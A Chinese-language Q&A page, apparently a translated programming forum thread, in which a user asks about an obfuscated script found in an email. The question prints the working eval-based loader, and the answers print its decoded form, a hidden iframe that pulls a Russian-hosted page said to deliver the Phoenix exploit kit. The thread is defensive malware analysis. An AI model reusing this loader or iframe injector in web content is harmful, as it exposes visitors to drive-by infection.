1. 首頁
  2. 問答
  3. 這是一個JavaScript黑客入侵嗎?

這是一個JavaScript黑客入侵嗎?

2012-03-30 38 views
4

我在電子郵件中發現了這個。有人能告訴我它想做什麼嗎?我擔心這可能是惡意的。這是一個JavaScript黑客入侵嗎?

我在網上看到,這可能只是「優化的JavaScript」。有沒有辦法讓它失效並看看它想要做什麼?

<script> 
c=2; 
i=c-2; 
if(parseInt("0123")===83) 
if(window.document) 
try{new String("asd").prototype.q} 
catch(egewgsd){ 
    f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87'] 
    [0].split('i'); 
    md='a'; 
    v="eval"; 
} 
if(v)e=window[v]; 
w=f; 
s=[]; 
r=String; 
for(;617!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);} 
if(f)z=s; 
e(z); 

</script>

來源

2012-03-30 user664408

+1

是,反向工程,可能通過利用Javascript解釋:) – 2012-03-30 15:21:50

+5

憑經驗:在郵件不要打開腳本 – 2012-03-30 15:22:36

+3

更是這樣...... **永遠不要相信任何包含EVAL ** – 2012-03-30 15:24:42

回答

3

它打開一個加載Phoenix exploit kit的IFrame。要查看Javascript代碼,請將「eval」更改爲「alert」。這是它:

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

來源

2012-03-30 15:26:37 Diego

4 
if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} 
else { 
    document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 

function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
}

來源

2012-03-30 15:24:22 Esailija

1

如果通過一個console.log(z)取代的最後一行,並貼吧例如谷歌Chrome控制檯,你會得到代碼...

if (document.getElementsByTagName('body')[0]){ 
     iframer(); 
    } else { 
     document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
    } 
    function iframer(){ 
     var f = document.createElement('iframe');f.setAttribute('src','http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); 
     document.getElementsByTagName('body')[0].appendChild(f); 
    }

來源

2012-03-30 15:24:30

0

編輯:其他人發佈了代碼。

我去了網站。它有一些似乎包含特洛伊木馬的Java小程序。避免!

來源

2012-03-30 15:31:13 steve

相關問題

 相關問題